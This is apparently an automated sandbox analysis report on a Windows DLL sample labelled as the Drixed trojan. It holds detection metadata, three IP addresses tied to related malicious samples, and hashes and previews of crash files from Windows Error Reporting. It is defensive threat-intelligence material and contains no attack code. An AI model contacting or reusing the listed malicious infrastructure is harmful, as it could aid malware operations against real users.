Sample file name:	SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.12131 (renamed file extension from 12131 to dll)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.troj.evad.winDLL@33/18@0/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 57.2% (good quality ratio 52.1%) Quality average: 77% Quality standard deviation: 31.7%
HCA Information:	Successful, ratio: 67% Number of executed functions: 29 Number of non-executed functions: 8
Cookbook Comments:	Adjust boot time Enable AMSI Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 20.82.210.154, 23.211.6.115, 23.211.4.86, 20.189.173.22, 13.89.179.12, 104.208.16.94, 20.42.73.29 Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, onedsblobprdcus17.centralus.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, arc.trafficmanager.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, onedsblobprdcus16.centralus.cloudapp.azure.com Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

Time	Type	Description
04:51:44	API Interceptor	1x Sleep call for process: loaddll32.exe modified
04:53:32	API Interceptor	4x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
66.147.235.11	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse
	Early_Access.-3878_20211027.xlsb	Get hash	malicious	Browse
	ckrgvIQvmUux.dll	Get hash	malicious	Browse
	ckrgvIQvmUux.dll	Get hash	malicious	Browse
	Casting Invite.-859403670_20211027.xlsb	Get hash	malicious	Browse
149.202.179.100	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse
	Early_Access.-3878_20211027.xlsb	Get hash	malicious	Browse
	ckrgvIQvmUux.dll	Get hash	malicious	Browse
	ckrgvIQvmUux.dll	Get hash	malicious	Browse
	Casting Invite.-859403670_20211027.xlsb	Get hash	malicious	Browse
81.0.236.89	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse
	Early_Access.-3878_20211027.xlsb	Get hash	malicious	Browse
	ckrgvIQvmUux.dll	Get hash	malicious	Browse
	ckrgvIQvmUux.dll	Get hash	malicious	Browse
	Casting Invite.-859403670_20211027.xlsb	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
HOSTROCKETUS	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse	66.147.235.11
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse	66.147.235.11
	Early_Access.-3878_20211027.xlsb	Get hash	malicious	Browse	66.147.235.11
	ckrgvIQvmUux.dll	Get hash	malicious	Browse	66.147.235.11
	ckrgvIQvmUux.dll	Get hash	malicious	Browse	66.147.235.11
	Casting Invite.-859403670_20211027.xlsb	Get hash	malicious	Browse	66.147.235.11
	s1uOMLvpO4.exe	Get hash	malicious	Browse	216.120.236.127
	WGs54P9e8a	Get hash	malicious	Browse	216.120.241.108
	ba2Eq178BGXyW5T.exe	Get hash	malicious	Browse	216.120.237.68
	4TXvMuUjTxE2kqz.exe	Get hash	malicious	Browse	66.147.239.119
	Requirements-oct_2020.exe	Get hash	malicious	Browse	66.147.239.119
	JESEE FRIED FIRDAY.exe	Get hash	malicious	Browse	66.147.239.119
	Scan_0884218630071 Bank Swift.exe	Get hash	malicious	Browse	66.147.239.119
	BANK ACCOUNT DETAILS ATTACHED.pdf.exe	Get hash	malicious	Browse	66.147.239.119
	XYmX3bLQJ9.xls	Get hash	malicious	Browse	66.147.238.141
	payment730.xls	Get hash	malicious	Browse	66.147.238.141
	Inf328.xls	Get hash	malicious	Browse	66.147.238.141
OVHFR	SecuriteInfo.com.Drixed-FJXEDADFD868F1D.21569.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Trojan.Win32.Save.a.28377.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse	149.202.179.100
	SecuriteInfo.com.Trojan.Win32.Save.a.16213.dll	Get hash	malicious	Browse	149.202.179.100
	protocol-1096018033.xls	Get hash	malicious	Browse	192.99.46.215
	protocol-1096018033.xls	Get hash	malicious	Browse	192.99.46.215
	arm7	Get hash	malicious	Browse	8.33.207.78
	#U0191ACTU#U0156A_wfpqacDkwlb__Z2676679.vbs	Get hash	malicious	Browse	144.217.33.249
	Byov62cXa1.exe	Get hash	malicious	Browse	94.23.24.82
	Early_Access.-3878_20211027.xlsb	Get hash	malicious	Browse	149.202.179.100
	ckrgvIQvmUux.dll	Get hash	malicious	Browse	149.202.179.100
	ckrgvIQvmUux.dll	Get hash	malicious	Browse	149.202.179.100
	Casting Invite.-859403670_20211027.xlsb	Get hash	malicious	Browse	149.202.179.100
	lyVSOhLA7o.dll	Get hash	malicious	Browse	51.210.102.137
	protocol-1441399238.xls	Get hash	malicious	Browse	192.99.46.215
	protocol-1441399238.xls	Get hash	malicious	Browse	192.99.46.215
	protocol-1086855687.xls	Get hash	malicious	Browse	192.99.46.215
	protocol-1086855687.xls	Get hash	malicious	Browse	192.99.46.215
	New order payment.exe	Get hash	malicious	Browse	51.210.240.92
	v2c.exe	Get hash	malicious	Browse	5.39.3.130

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_2b57d984458e21441755dcb7fd69ad7959479eb3_82810a17_06ac9ba8\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9174528397587974
Encrypted:	false
SSDEEP:	192:7Ri70oXmHBUZMX4jed+d/u7suS274ItWc:9ilXeBUZMX4jeo/u7suX4ItWc
MD5:	CF7CD7EB4BAA98CDB4DFA099BE62AF48
SHA1:	C1CBF75E010B107E05B919F52BA64B3989A0E3DF
SHA-256:	09C4023481DA95298694FEC463CF2FBDD12C106962E0A5D35DB3EEAE0D9ED4A4
SHA-512:	29381A14C5A6993E8737B6A2126F8E19584167068F167288BF636127C9F8696B8309FCC21E753D508D77118D354CB698ADB72C82766B6A14CFA1805035686277
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.9.8.9.5.6.0.1.4.1.6.1.1.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.9.8.9.5.6.1.5.2.5.9.8.0.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.f.a.6.4.0.3.2.-.6.f.b.b.-.4.f.8.8.-.a.0.6.c.-.d.5.1.c.6.6.8.f.9.7.d.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.b.4.a.f.5.0.3.-.1.f.0.7.-.4.8.2.1.-.a.9.1.0.-.7.b.d.3.f.f.4.0.6.9.3.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.c.8.-.0.0.0.1.-.0.0.1.7.-.9.8.a.2.-.6.f.2.d.f.2.c.b.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_5f8c232292098bd3183b3bd76fd57ba47bd4c4b_82810a17_056488dc\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9171776919766541
Encrypted:	false
SSDEEP:	192:82mit0oXmHBUZMX4jed+d/u7suS274ItWc:ZmijXeBUZMX4jeo/u7suX4ItWc
MD5:	A4E2D7D8C3B761D8F55E4B27013DB19A
SHA1:	77FFCF59E0C5CC3DB91F3BB603F9B79FD20E7776
SHA-256:	97D7E2678CD2EF7A49260D184CCCF3CA0A252D52FCCB9CD5BF8F47A86F8B9790
SHA-512:	34A5DA7B1D8B738F85123F613921A8703A4C336DA1056309B5D8A5B6E33EC6393D2511B6A767EBE92038B0B43C76C6DC6192116EEE5602CD61C8A51C451B8944
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.9.8.9.5.5.9.4.6.4.9.1.1.6.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.9.8.9.5.6.1.1.1.9.5.8.7.9.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.8.4.b.3.a.7.9.-.3.f.5.b.-.4.9.8.4.-.8.7.c.7.-.a.4.d.a.7.0.8.f.4.c.d.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.4.8.6.e.5.7.3.-.9.e.a.8.-.4.5.1.4.-.a.5.e.3.-.3.c.5.2.b.4.b.a.d.a.6.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.c.-.0.0.0.1.-.0.0.1.7.-.4.b.f.0.-.4.2.2.d.f.2.c.b.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_af1de8448413c76b457f536b7859b51ff1ab58_82810a17_0644a712\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9169366768249558
Encrypted:	false
SSDEEP:	192:xnim0oXgHBUZMX4jed+d/u7suS274ItWcb:RiAXIBUZMX4jeo/u7suX4ItWcb
MD5:	52C5577C1D0F67DE06749DC5CD2579A7
SHA1:	562EFF5560B3EC885F54484399F2A966DC789E2B
SHA-256:	A90C59201AE0DDC5579D586AAB18CAAA937C7363D91A76DFE3BDC4459191925B
SHA-512:	26B79EAB74365840D9517F3872BBFCA2EB2828C6A95F3647B93BB1C751FBDB4BF25D0982ADD51D3E72048F8090A4D7B7D6A5DFFA01EBC5C5F3646C135FB17AEA
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.9.8.9.5.6.1.0.4.2.3.9.5.0.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.9.8.9.5.6.1.9.5.3.3.2.6.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.f.b.7.3.a.b.b.-.f.c.d.1.-.4.c.7.4.-.8.c.1.a.-.4.5.7.9.4.e.a.9.f.7.d.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.3.2.c.9.9.7.1.-.8.6.5.8.-.4.c.b.2.-.8.8.4.0.-.3.e.1.b.d.b.2.d.f.b.f.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.d.4.-.0.0.0.1.-.0.0.1.7.-.4.c.4.e.-.a.3.2.d.f.2.c.b.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_c316961cf9547f4477c913cd7ccdecd11bd19_82810a17_1384863c\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9170555310689312
Encrypted:	false
SSDEEP:	192:s8pib0oXSHBUZMX4jed+d/u7suS274ItWc:vpiFXqBUZMX4jeo/u7suX4ItWc
MD5:	136E2022FE3668BE06BF4D9CA54E8C40
SHA1:	A44E90D03671726C3176577FAC94942601DF12D6
SHA-256:	46FE6DB306F2A2E67744B49483DE10010A69AC166D4978F9A532702C0A745695
SHA-512:	D9D9B9F2E16058730E642E5A5AC34B748D201EEAD105B12C2C8C530CFC7382ACDEC43DCE2A16E21C1B31121C7A1C24FFB8070BD02ABE926A24053F1DB2D336D8
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.9.8.9.5.5.9.2.4.2.5.3.0.1.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.9.8.9.5.6.0.9.3.7.8.3.0.4.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.5.3.5.a.e.7.b.-.3.4.9.e.-.4.1.2.b.-.b.3.7.2.-.4.c.e.6.6.b.3.7.1.f.f.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.4.e.f.2.6.2.b.-.d.f.a.9.-.4.7.2.4.-.9.f.e.e.-.7.d.8.5.0.5.c.5.b.d.2.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.0.-.0.0.0.1.-.0.0.1.7.-.8.a.1.7.-.1.5.2.d.f.2.c.b.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3916.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Oct 28 11:53:15 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	45496
Entropy (8bit):	2.143027220745551
Encrypted:	false
SSDEEP:	192:+9TTNgJvRpO5Skb5a8/gS68oGwH1k7bEmMP5e2IjWIrNxQkn6d:Cyy5LbIvSBon8zMheXjWwL8
MD5:	BEC3FEE4BDB7C15EA5A63901CB714201
SHA1:	5CD6654B5950A02ABA79D6A78466D748E3069593
SHA-256:	EB377D71C2B3470B08011992990098219B5FAE7077104F5819C3615B1FB7545D
SHA-512:	70EB91B800C7BA058536FF2CEEC2C041473A1A0222EEB6682373E67464AF18E5CA95A5D9550A4EF5F0E6CE8F804C9AF7B9D78676484B0D1822F0D87986CD3151
Malicious:	false
Preview:	MDMP....... .......+.za.........................................-..........T.......8...........T...............(...........0................................................................................U...........B..............GenuineIntelW...........T............za.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER41C1.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Oct 28 11:53:20 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	46344
Entropy (8bit):	2.0980430418663416
Encrypted:	false
SSDEEP:	192:xAwTNgwFnm2O5Skby+/QUjrxXkHjQm168lOs67uI+XnxH:BTS5LbydqXuX967uNB
MD5:	9166A0C57EA401C40279942ECBE4962B
SHA1:	79B6D015AF7E4022EC3E4DCD399794947461D3D2
SHA-256:	0556A7F7D118E536AE09FAB5E501FE92988ACD20B968CC0CDF9B597CBB337ACD
SHA-512:	68B1F9AC3A6D0E60EFF247C9637F7F3C3461589D01A852F7940F24FECD6DBF939AAC00C8C35E884BECBB5F6B11F4EA5332707E18E7957ED5B3BCA7AF0DF985B5
Malicious:	false
Preview:	MDMP....... .......0.za.........................................-..........T.......8...........T...............x...........0................................................................................U...........B..............GenuineIntelW...........T............za.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER524C.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8336
Entropy (8bit):	3.6976470102343444
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNia26RGfk/6Ypk6UGgmfT5SOCprM89b+gsfH7AKm:RrlsNij6Yk/6Y66UGgmfT5Sf+zfHY
MD5:	41685C54F4CDB54041A01238ED37A234
SHA1:	6D69DDB1AC93E29704C61D63334E15F800AFB298
SHA-256:	39EDE2DC7B4F2602C4063FA459B5A5C2E258892F527E5A6ED96BEFB25F756CF0
SHA-512:	9134F3D499E4ED24D565878B00C449346D7F364425E852EC120AB0B6B9308E72F73B1DC793CB52EBB2AD349AE8AE65FF8F5CE8904C060CC9681990CC23757933
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.0.8.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER575E.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4700
Entropy (8bit):	4.504328157835534
Encrypted:	false
SSDEEP:	48:cvIwSD8zsiJgtWI9SCrWSC8Bv8fm8M4JCdsPF2/H+q8/hNU4SrSWd:uITfwBCaSNaJmjDWWd
MD5:	ACB43C10C671E9BE172B578068D0E298
SHA1:	CCE46738C7513524BB0C746C0D5F12D4ACBD380C
SHA-256:	40F51E7D47C7C3B99C00453ED5CA3A3619E749BEB441299A505E7271469A22FF
SHA-512:	E2422ED8BD2B0D0E5B8266D586C46C87E51AA322D660C9F5D4D5F7AB59191F9E59167F73F86D6509CB35E1DE6EC3C6696F4AF3F2C3A2FEBED8868B241498C05B
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1229583" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5B55.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8336
Entropy (8bit):	3.696536986814097
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiDR6HfXe6Ypl6UGgmfTYSOCpr289bFasf+Xm:RrlsNiV6m6Yb6UGgmfTYSZF5ff
MD5:	9E19BA093FECC4B050823625C7FAF9B8
SHA1:	07C2AE77903973666D4452B613416C7AF1B44907
SHA-256:	0E02ECD9D6168DAE822C1EB0C45D24B86974FFD5A721A17FC1BA9D86A9CDB3AD
SHA-512:	2D5DA57A9BA34EF5431E99F2D40BBE0ADCC67045AB5C130E22EC70B3EDCA0402DB0AA435C93B2A6BF019AAE30334D3333684C927323AF9472FECF3398EDDD0B3
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.0.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C2E.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Oct 28 11:53:25 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	42904
Entropy (8bit):	2.2176430681154145
Encrypted:	false
SSDEEP:	192:EwJoTNgYoGjO5SkbG33eExZZUKZ036wX4wOeA2BKtsdYnu:ye55LbGOw036qCeA22u
MD5:	F1B70EC3886F544E53F61634D143AAF5
SHA1:	82B02996B6927E98B3B7FA4D8221B4A3B4281922
SHA-256:	197A27AEF881D9AA396CDD7CE67CF2393A83F93F719E52444A0E4B9996A14CD6
SHA-512:	2F940679FB60F1634DA72800B6AF1863C72D791C72F571BDF583D7FF378B499EC4B5AE67C4F28A2020083A4DB423D5E0B2FDAFA7BF4E9A39997E950D74603EEC
Malicious:	false
